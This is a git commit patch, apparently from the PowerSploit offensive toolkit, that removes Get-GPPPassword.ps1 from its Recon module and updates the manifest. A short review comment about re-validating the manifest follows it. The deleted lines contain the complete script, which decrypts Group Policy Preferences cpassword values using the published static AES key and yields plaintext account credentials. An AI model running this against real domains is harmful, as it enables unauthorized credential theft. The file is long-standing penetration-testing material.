From 371c65c9a7493f0a8e02a6f888d6b75a42a77566 Mon Sep 17 00:00:00 2001
From: Matt Graeber
Date: Wed, 3 Jul 2013 05:46:44 -0400
Subject: Updated Get-GPPPassword
---
 Recon/Get-GPPPassword.ps1 | 106 ----------------------------------------------
 Recon/Recon.psd1 | 4 +-
 2 files changed, 2 insertions(+), 108 deletions(-)
 delete mode 100644 Recon/Get-GPPPassword.ps1
(limited to 'Recon')
diff --git a/Recon/Get-GPPPassword.ps1 b/Recon/Get-GPPPassword.ps1
deleted file mode 100644
index b22fb74..0000000
--- a/Recon/Get-GPPPassword.ps1
+++ /dev/null
@@ -1,106 +0,0 @@
-function Get-GPPPassword
-{
-<#
-.SYNOPSIS
-
-Retrieves the plaintext password for accounts pushed through Group Policy in groups.xml.
-
-PowerSploit Function: Get-GPPPassword
-Author: Chris Campbell (@obscuresec)
-License: BSD 3-Clause
-Required Dependencies: None
-Optional Dependencies: None
-
-.DESCRIPTION
-
-Get-GPPPassword imports the encoded and encrypted password string from groups.xml and then decodes and decrypts the plaintext password.
-
-.PARAMETER Path
-
-The path to the targeted groups.xml file.
-
-.EXAMPLE
-
-Get-GPPPassword -path c:\demo\groups.xml
-
-.LINK
-
-http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
-http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html
-#>
-
- Param (
- [Parameter(Position = 0, Mandatory = $True)]
- [String]
- $Path = "$PWD\groups.xml"
- )
-
- #Function to pull encrypted password string from groups.xml
- function Parse-cPassword {
-
- try {
- [xml] $Xml = Get-Content ($Path)
- [String] $Cpassword = $Xml.Groups.User.Properties.cpassword
- } catch { Write-Error "No Password Policy Found in File!" }
-
- return $Cpassword
- }
-
- #Function to look to see if the administrator account is given a newname
- function Parse-NewName {
-
- [xml] $Xml = Get-Content ($Path)
- [String] $NewName = $Xml.Groups.User.Properties.newName
-
- return $NewName
- }
-
- #Function to parse out the Username whose password is being specified
- function Parse-UserName {
-
- try {
- [xml] $Xml = Get-Content ($Path)
- [string] $UserName = $Xml.Groups.User.Properties.userName
- } catch { Write-Error "No Username Specified in File!" }
-
- return $UserName
- }
-
- #Function that decodes and decrypts password
- function Decrypt-Password {
-
- try {
- #Append appropriate padding based on string length
- $Pad = "=" * (4 - ($Cpassword.length % 4))
- $Base64Decoded = [Convert]::FromBase64String($Cpassword + $Pad)
- #Create a new AES .NET Crypto Object
- $AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider
- #Static Key from http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be%28v=PROT.13%29#endNote2
- [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
- 0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
- #Set IV to all nulls (thanks Matt) to prevent dynamic generation of IV value
- $AesIV = New-Object Byte[]($AesObject.IV.Length)
- $AesObject.IV = $AesIV
- $AesObject.Key = $AesKey
- $DecryptorObject = $AesObject.CreateDecryptor()
- [Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)
-
- return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
- } catch { Write-Error "Decryption Failed!" }
-
- }
-
- $Cpassword = Parse-cPassword
- $Password = Decrypt-Password
- $NewName = Parse-NewName
- $UserName = Parse-UserName
-
- $Results = New-Object System.Object
-
- Add-Member -InputObject $Results -type NoteProperty -name UserName -value $UserName
- Add-Member -InputObject $Results -type NoteProperty -name NewName -value $NewName
- Add-Member -InputObject $Results -type NoteProperty -name Password -value $Password
-
- return $Results
-
-}
diff --git a/Recon/Recon.psd1 b/Recon/Recon.psd1
index 59c6377..afcb7fb 100644
--- a/Recon/Recon.psd1
+++ b/Recon/Recon.psd1
@@ -73,8 +73,8 @@ AliasesToExport = '' ModuleList = @(@{ModuleName = 'Recon'; ModuleVersion = '1.0.0.0'; GUID = '7e775ad6-cd3d-4a93-b788-da067274c877'}) # List of all files packaged with this module -FileList = 'Recon.psm1', 'Recon.psd1', 'Get-GPPPassword.ps1', 'Get-HttpStatus.ps1', - 'Invoke-ReverseDnsLookup.ps1', 'Usage.md' +FileList = 'Recon.psm1', 'Recon.psd1', 'Get-HttpStatus.ps1', 'Invoke-ReverseDnsLookup.ps1', + 'Usage.md' # Private data to pass to the module specified in RootModule/ModuleToProcess # PrivateData = '' -- cgit v1.2.3
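Review bot: Dropping 'Get-GPPPassword.ps1' from FileList is only part of unregistering the function from the Recon module; if Recon.psm1 still dot-sources that file, or FunctionsToExport (above line 73, outside this hunk) still names Get-GPPPassword, Import-Module will either fail on the missing file or advertise a command that no longer resolves. Neither spot is visible in this diff, so this is a check to run rather than a confirmed defect. The manifest should be regenerated or re-validated with `Test-ModuleManifest .\Recon\Recon.psd1` so the FileList and export lists agree with the files actually shipped.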